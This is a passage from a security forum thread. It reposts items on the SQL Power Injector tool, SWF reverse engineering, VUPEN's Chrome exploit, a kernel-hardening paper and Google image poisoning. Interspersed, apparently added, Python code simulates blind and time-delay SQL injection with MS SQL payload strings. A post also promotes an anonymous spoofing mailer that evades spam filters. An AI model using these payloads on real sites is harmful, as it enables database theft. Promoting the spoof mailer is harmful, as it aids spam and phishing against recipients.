That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required. Also, I cannot recall to have seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results by giving up after long hours of copy pasting the command in the browser when done manually. I don't remember as well to have seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures) I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section. Summary of the differences: Web page string and cookie parameters auto detection Fine tuning parameters SQL injection Time delay feature Multithread feature Response results in a customized browser Automated positive and negative condition discovery Blind SQL injection characters preset optimizer Screenshots You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind. Screen 1: SQL Power injector with Normal technique Screen 2: SQL Power injector with Blind technique Some Statistic Figures I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data. 
Another thing, I didn't make enough tests (10 times for each thread) to have a real statistical sample since the goal of these numbers will be to show approximately what you can expect. Moreover, it will depend also of the size of the data sought. Sometimes a lower number of threads will be more effective than more. In fact, the time taken will be optimized if the length of the value is a divisible number of the number of thread. So let's say we have 24 characters length, 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the bigger gap of time between any thread is from 1 to 2. As you can see the higher is not always the better. You will see some examples in the following statistics. Even though you can go up to 50 threads, I have discovered that around 10 threads it's starting to have errors and getting slower and slower. So again bigger number of threads is not necessary better. I must warn as well that the higher number of threads is, the higher is the chances to crash the web application (web server or database) I must thank Nathaniel Felsen to have allowed me to test on one of his web server and my wife Elizabeth to have done all the tedious tests for me in her free time. Here are the characteristics of the computer used to make the tests: AMD Athlon ? 64 X2 Dual Core Processor 4200+ GHz 2 GB of RAM Windows XP SP 2 ADSL 1 MB/s Ping round trip average time of 173 ms Download: http://www.sqlpowerinjector.com/download.htm
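The techniques listed above (true/false page comparison, time delay, an ordered ASCII character preset and the thread-count rule of thumb) as an added, self-contained simulation. This is example code, not SQL Power Injector's own implementation: the target page, the secret, the response bodies and the MS SQL payload templates are all constructed for the demo, and the `{code}` placeholder stands in for the tool's `<<@>>` variable. The rule of thumb about divisibility assumes every position costs roughly the same number of requests, which the preset ordering deliberately breaks, so it is kept as a separate cost model rather than measured.

```python
"""Added example, not SQL Power Injector's own code: a simulation of how a
blind SQL injection is automated with a true/false page comparison, with a
time delay, and with an ordered character preset, plus the thread-count rule
of thumb. The secret, page responses and payload templates are constructed;
the MS SQL syntax is an assumption."""
import re
import string
from concurrent.futures import ThreadPoolExecutor

SECRET = "sa_admin2011"  # constructed: the value the attacker wants to read

# Payload templates in the tool's style: {pos} is the character position and
# {code} stands in for the tool's <<@>> variable (the candidate ASCII code).
BOOL_TEMPLATE = ("' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysusers),"
                 "{pos},1))={code}--")
TIME_TEMPLATE = ("'; IF ASCII(SUBSTRING((SELECT TOP 1 name FROM sysusers),"
                 "{pos},1))={code} WAITFOR DELAY '0:0:3'--")
_COND = re.compile(r"\),(\d+),1\)\)=(\d+)")


def simulated_target(payload: str) -> dict:
    """Stand-in for the vulnerable page: evaluates the injected condition
    against SECRET and returns what the tool observes (body and latency)."""
    pos, code = (int(g) for g in _COND.search(payload).groups())
    hit = pos <= len(SECRET) and ord(SECRET[pos - 1]) == code
    if "WAITFOR DELAY" in payload:          # time-delay technique
        return {"body": "Welcome", "seconds": 3.0 if hit else 0.1}
    return {"body": "Welcome" if hit else "Login failed", "seconds": 0.1}


def boolean_oracle(pos: int, code: int) -> bool:
    """True/false comparison: does the page match the known positive page?"""
    return simulated_target(BOOL_TEMPLATE.format(pos=pos, code=code))["body"] == "Welcome"


def time_oracle(pos: int, code: int) -> bool:
    """Time-delay comparison: a slow response means the condition held."""
    return simulated_target(TIME_TEMPLATE.format(pos=pos, code=code))["seconds"] >= 2.5


# Character presets: the order in which candidates are tried per position.
FULL_PRESET = [chr(c) for c in range(0x20, 0x7F)]       # every printable ASCII
_LIKELY = string.ascii_lowercase + string.digits + "_"  # what a DB name looks like
TUNED_PRESET = list(_LIKELY) + [c for c in FULL_PRESET if c not in _LIKELY]


def extract(oracle, length: int, preset, threads: int = 1):
    """Recover `length` characters by testing candidates in preset order,
    one position per worker. Returns (value, number_of_requests)."""
    found = {}

    def solve(pos):
        for n, ch in enumerate(preset, 1):
            if oracle(pos, ord(ch)):
                found[pos] = (ch, n)
                return
        found[pos] = ("?", len(preset))   # not in preset: widen it

    with ThreadPoolExecutor(max_workers=threads) as pool:
        list(pool.map(solve, range(1, length + 1)))
    value = "".join(found[p][0] for p in range(1, length + 1))
    return value, sum(found[p][1] for p in range(1, length + 1))


def positions_on_busiest_thread(length: int, threads: int) -> int:
    """Positions are dealt round-robin, so wall-clock time is driven by the
    thread holding the most positions; adding threads only helps when that
    count drops, i.e. when the thread count divides the length."""
    return -(-length // threads)


if __name__ == "__main__":
    for name, preset in (("full", FULL_PRESET), ("tuned", TUNED_PRESET)):
        value, requests = extract(boolean_oracle, len(SECRET), preset, threads=4)
        print(f"{name:5s}: {value!r} in {requests} requests")
    print("time-delay:", extract(time_oracle, len(SECRET), TUNED_PRESET)[0])
    print("24 chars:", {t: positions_on_busiest_thread(24, t) for t in range(1, 9)})
```

Against a real target the two oracles would be HTTP requests, and the true/false one would compare the whole response against a known positive page (or a marker string) rather than a literal body; the request counts the tuned preset saves are what the tool's ASCII character preset feature buys you.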
  17. No, Google had pretty much started monopolizing; Microsoft has fallen somewhat behind...
  18. Who cares where they got the idea from; our problem is to find ways to make lots of money out of this, easily and of course legally.
  19. SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering The SWFRETools package contains three different tools. The most advanced tool is called Flash Dissector. It is a Java-based GUI tool you can use to inspect the binary content of SWF files. The second tool is a Java-based command-line tool called Minimizer. This tool is useful for vulnerability researchers who have a SWF file that crashes Flash Player and want to get rid of all the parts of the SWF file that are not related to the crash. The third tool is a primitive Python-based debugger that can be used to hook and trace the Flash Player executable. Download: https://github.com/sporst/SWFREtools/downloads Source: SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering ! ~ THN : The Hackers News
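The two things the post describes, dissecting the binary layout of a SWF file and cutting a crashing file down to the tags that matter, as an added example. This is not SWFRETools code: it is a minimal parser for the SWF container (signature, version, file length, frame RECT, and tag record headers in both the short and the long form), plus a greedy one-tag-at-a-time minimizer driven by a constructed "does the player crash" oracle. The sample tags and the crash condition are made up for the demo.

```python
"""Added example, not part of SWFRETools: a minimal parser for the SWF
container (header, frame RECT, tag record headers in short and long form)
and a one-tag-at-a-time minimizer of the kind Minimizer is described as,
driven by a constructed stand-in for "does Flash Player crash on this file".
The tag contents and the crash condition are made up for the demo."""
import struct
import zlib

TAG_NAMES = {0: "End", 1: "ShowFrame", 2: "DefineShape", 9: "SetBackgroundColor",
             12: "DoAction", 39: "DefineSprite", 69: "FileAttributes", 82: "DoABC"}


def encode_rect(nbits, *vals):
    """RECT: 5-bit Nbits, then four Nbits-wide signed fields, MSB first, padded."""
    bits = format(nbits, "05b") + "".join(
        format(v & ((1 << nbits) - 1), f"0{nbits}b") for v in vals)
    bits += "0" * (-len(bits) % 8)
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def encode_tag(code, data):
    """RECORDHEADER: UI16 with the tag code in the top 10 bits and the length
    in the low 6; a length of 0x3F means a UI32 length follows."""
    if len(data) < 0x3F:
        return struct.pack("<H", (code << 6) | len(data)) + data
    return struct.pack("<HI", (code << 6) | 0x3F, len(data)) + data


def build_swf(tags, version=10, compress=False):
    """Assemble a SWF; the frame count is the number of ShowFrame tags."""
    body = encode_rect(15, 0, 11000, 0, 8000)                 # 550x400 px stage
    body += struct.pack("<HH", 24 << 8, sum(1 for c, _ in tags if c == 1))
    body += b"".join(encode_tag(c, d) for c, d in tags)
    header = struct.pack("<3sBI", b"CWS" if compress else b"FWS", version, 8 + len(body))
    return header + (zlib.compress(body) if compress else body)


def parse_swf(data):
    """Parse header, RECT and tag list; returns tags as (code, payload)."""
    sig = data[:3]
    if sig not in (b"FWS", b"CWS"):
        raise ValueError("not a SWF (expected FWS/CWS signature)")
    version, file_length = struct.unpack_from("<BI", data, 3)
    if sig == b"CWS":                                 # zlib body after the header
        data = data[:8] + zlib.decompress(data[8:])
    nbits = data[8] >> 3                              # top 5 bits of the RECT
    off = 8 + (5 + 4 * nbits + 7) // 8                # RECT is byte-aligned
    rate, frames = struct.unpack_from("<HH", data, off)
    off += 4
    tags = []
    while off + 2 <= len(data):
        hdr = struct.unpack_from("<H", data, off)[0]
        off += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:                            # long form
            length = struct.unpack_from("<I", data, off)[0]
            off += 4
        if off + length > len(data):
            raise ValueError(f"tag {code} at {off} runs past end of file")
        tags.append((code, data[off:off + length]))
        off += length
        if code == 0:
            break
    return {"version": version, "file_length": file_length,
            "frame_rate": rate / 256, "frame_count": frames, "tags": tags}


def minimize(swf, crashes):
    """Drop each non-End tag in turn and keep the removal if the oracle still
    crashes. Greedy and single-pass, not full delta debugging."""
    info = parse_swf(swf)
    tags = list(info["tags"])
    i = 0
    while i < len(tags):
        candidate = tags[:i] + tags[i + 1:]
        if tags[i][0] != 0 and crashes(build_swf(candidate, info["version"])):
            tags = candidate
            continue
        i += 1
    return tags


# Constructed sample: the DoABC blob is long enough to need the long-form header.
SAMPLE_TAGS = [
    (69, b"\x08\x00\x00\x00"),                             # FileAttributes
    (9, b"\xff\xff\xff"),                                  # SetBackgroundColor
    (2, b"\x01\x00" + b"\x00" * 10),                       # DefineShape id 1
    (82, b"\x01\x00\x00\x00frame\x00BAD" + b"\x00" * 80),  # DoABC
    (12, b"\x00"),                                         # DoAction: End action
    (1, b""),                                              # ShowFrame
    (0, b""),                                              # End
]


def fake_player_crashes(swf):
    """Stand-in crash oracle: the bad DoABC only crashes when a shape exists."""
    tags = parse_swf(swf)["tags"]
    return any(c == 2 for c, _ in tags) and any(c == 82 and b"BAD" in d for c, d in tags)


if __name__ == "__main__":
    swf = build_swf(SAMPLE_TAGS)
    print([TAG_NAMES.get(c, c) for c, _ in parse_swf(swf)["tags"]])
    print([TAG_NAMES.get(c, c) for c, _ in minimize(swf, fake_player_crashes)])
```

With a real crash the oracle is "run the player under a debugger on this file and check for the fault"; the minimizer then keeps only the tags the crash depends on, which in the sample is the shape and the bad DoABC, because removing either makes the oracle stop firing.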
  20. Online Fake Mailer As IT managed services are now focusing on clouds, so is information security. Spam mails are the biggest threat to every individual and it is not going to end any time soon. But nowadays spam filters do their job quite efficiently, making spammers' lives a bit worried. So here is an online service, we mean a "cloud service", which can test the skills of both spammers and spam filters. Small list of features:
- Email doesn't go in the spam folder
- Instant delivery of emails
- With attachment support
- With HTML editor
- And many other features
http://emkei.cz/
  21. Google Chrome Pwned by VUPEN aka Sandbox/ASLR/DEP Bypass Hi everyone, We are (un)happy to announce that we have officially Pwned Google Chrome and its sandbox. The exploit shown in this video is one of the most sophisticated codes we have seen and created so far, as it bypasses all security features including ASLR/DEP/Sandbox; it is silent (no crash after executing the payload), it relies on undisclosed (0day) vulnerabilities discovered by VUPEN, and it works on all Windows systems (32-bit and x64). The video shows the exploit in action with Google Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64). The user is tricked into visiting a specially crafted web page hosting the exploit, which will execute various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level. Note: The Calculator is used here as an example; it can be replaced by any other payload. While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own contest during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP. This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services. Source and demo video: http://www.vupen.com/demos/
  22. Skype in negotiations for a partnership with Microsoft? 09 May 2011 | 11:29 Aurelian Mihai Skype, the renowned provider of internet telephony services, has become the subject of rumours following information that surfaced last week about intense negotiations between the company's officials and representatives of Facebook and Google, apparently to establish a partnership or even an acquisition of the company. Now even Microsoft seems to be entering the negotiations, and there are plenty of motives for a possible partnership or for acquiring the Skype portfolio: The acquisition of, or partnership with, Skype could put the company in a favourable position in the enterprise communications market, where Skype already has a solid presence in voice, video and sharing services. By acquiring Skype, Microsoft would obtain the right to integrate the company's services into future versions of the Windows Mobile platform, thus boosting its adoption by a wider audience. Together with Skype, Microsoft would have the opportunity to collaborate with the large mobile network operators, many of whom are already interested in a partnership with Skype. Information from sources close to Skype promises an official announcement during this week. While a full acquisition is unlikely, we may witness the creation of a partnership between Microsoft and Skype, similar to the one already established with Nokia, from which both companies would benefit. Source: Skype in negotiations for a partnership with Microsoft?
  23. Facebook pays you to watch ads! 09 May 2011 | 10:21 Aurelian Mihai Facebook has introduced a new promotion program through which users are financially motivated to watch certain ads. Watching ads distributed through the Facebook network is rewarded using the credits system, each ad being worth 1 credit, or the equivalent of 10 cents. Even though this is not a substantial reward, the promise of earning something might be enough for those users who already spend a lot of time connected to the Facebook network and want to make that time count somehow. The paid advertising messages will appear mainly in games, such as those from Crowd Star, Digital Chocolate and Zynga. Facebook is working with Sharethrough, SocialVibe, Epic Media and SupersonicAds to supply ads for the program, as well as with TrialPay, a survey system whose participants are financially rewarded. Dan Greenberg, CEO of Sharethrough, said that Facebook's initiative represents a departure from the traditional system of interruptive ads, offering entertainment-style advertising messages that users will want to watch and forward to their friends. Although the earnings cannot be transferred to a credit card, the Facebook credits system lets us spend this money to buy various goods promoted in the ads we watch, or other virtual goods available within the network. Source: Facebook te pl
  24. Securing The Kernel via Static Binary Rewriting and Program Shepherding
Piotr Bania [: www.piotrbania.com :] 2011
Abstract
Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations, many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker the maximum privilege level and results in total machine compromise. To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel-level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether a given control flow transfer is valid or should be considered an attack attempt. Our solution is especially directed towards preventing remote kernel exploitation attempts. Additionally, many of the local privilege escalation attacks are also blocked (also due to additional mitigation techniques we have implemented). Our tool was tested with Microsoft Windows XP, Windows Vista and Windows 7 (on both virtual and physical machines) on IA-32 compatible processors. Our apparatus is also completely standalone and does not require any third-party software.
Download: http://www.piotrbania.com/all/articles/pbania-securing-the-kernel2011.pdf
  25. Poisoned Google image searches becoming a problem Posted on 06 May 2011. If you are a regular user of Google's search engine you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its best to mark the offending links as such, but it still has trouble when it comes to cleaning up its image search results. ISC's Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple. For one, they attack and compromise a great variety of legitimate websites - usually those which use WordPress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it. Then, they introduce PHP scripts into the sites' source code. "These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content," he explains. They also harvest other sites for images, and embed them into the site. When the scripts detect Google's crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database. "The exploit happens when a user clicks on the thumbnail," says Zdrnja. "Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background." Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page.
The PHP script inserted in it checks whether the user has come from a Google results page, and if so, it serves another script - this time a JavaScript one - that redirects the browser to another compromised site that serves malware. Users should be careful about what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as NoScript for the Firefox browser, but believes that Google could help by not using an iframe to display the results. More on Google image poisoning: http://isc.sans.edu/diary/More+on+Google+image+poisoning/10822 Source: Poisoned Google image searches becoming a problem
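The article describes a cloaking script that answers Googlebot with generated content, answers visitors arriving from a Google results page with a redirect, and leaves everyone else alone. That behaviour is visible from the site owner's side in the web server log, so here is the detection logic, as an added example that is not from the ISC diary or the article: it parses Apache combined-format lines, classifies each hit as crawler, Google-referred or direct, and flags any path whose status code or page size depends on that class. The log excerpt is constructed for the demo, and the size ratio threshold is an assumption.

```python
"""Added example, not from the ISC diary or the article: detection logic for
the cloaking pattern described above, run over constructed Apache combined
log lines. A path is flagged when the response differs depending on whether
the visitor is Googlebot, arrives from a Google referer, or comes directly."""
import re
from collections import defaultdict
from statistics import median
from urllib.parse import urlsplit

_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed log excerpt: a WordPress site carrying a dropped PHP script.
SAMPLE_LOG = """\
203.0.113.5 - - [06/May/2011:10:01:12 +0000] "GET /wp-content/uploads/trend.php HTTP/1.1" 200 18231 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [06/May/2011:10:03:44 +0000] "GET /wp-content/uploads/trend.php HTTP/1.1" 302 412 "http://www.google.com/imgres?imgurl=http%3A%2F%2Fexample.org%2Fa.jpg" "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"
198.51.100.9 - - [06/May/2011:10:05:01 +0000] "GET /wp-content/uploads/trend.php HTTP/1.1" 200 1540 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"
203.0.113.5 - - [06/May/2011:10:06:30 +0000] "GET /about/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [06/May/2011:10:07:02 +0000] "GET /about/ HTTP/1.1" 200 9120 "http://www.google.ro/search?q=about" "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"
198.51.100.9 - - [06/May/2011:10:08:15 +0000] "GET /about/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"
"""


def classify(referer: str, ua: str) -> str:
    """Visitor class the cloaking script keys on: crawler UA, Google referer, other."""
    if "googlebot" in ua.lower():
        return "crawler"
    host = urlsplit(referer).hostname or ""
    if re.fullmatch(r"(www\.)?google(\.[a-z]{2,3})+", host):
        return "google_referred"
    return "direct"


def parse_log(text: str):
    """Yield one dict per combined-format line; unparseable lines are skipped."""
    for line in text.splitlines():
        m = _COMBINED.match(line)
        if m:
            hit = m.groupdict()
            hit["status"] = int(hit["status"])
            hit["size"] = 0 if hit["size"] == "-" else int(hit["size"])
            hit["visitor"] = classify(hit["referer"], hit["ua"])
            yield hit


def find_cloaked_paths(text: str, size_ratio: float = 3.0):
    """Group hits by path and visitor class; flag a path if the status code
    set differs between classes or the crawler gets a much bigger page."""
    status = defaultdict(lambda: defaultdict(set))
    sizes = defaultdict(lambda: defaultdict(list))
    for hit in parse_log(text):
        status[hit["path"]][hit["visitor"]].add(hit["status"])
        sizes[hit["path"]][hit["visitor"]].append(hit["size"])
    findings = []
    for path, by_class in sorted(status.items()):
        if len(by_class) < 2:
            continue                      # nothing to compare against
        reasons = []
        if len({frozenset(s) for s in by_class.values()}) > 1:
            reasons.append("status code depends on visitor class")
        crawler, direct = sizes[path].get("crawler"), sizes[path].get("direct")
        if crawler and direct and median(crawler) > size_ratio * max(median(direct), 1):
            reasons.append("crawler receives a much larger page than direct visitors")
        if reasons:
            findings.append({"path": path, "status_by_class": dict(by_class),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_cloaked_paths(SAMPLE_LOG):
        print(f["path"], f["status_by_class"], "; ".join(f["reasons"]))
```

On a real server the same comparison can be made actively, by fetching a suspect URL once with a Googlebot User-Agent, once with a Google referer and once plainly, but the log-based version has the advantage of covering every path the attacker actually used, not only the ones you thought to probe.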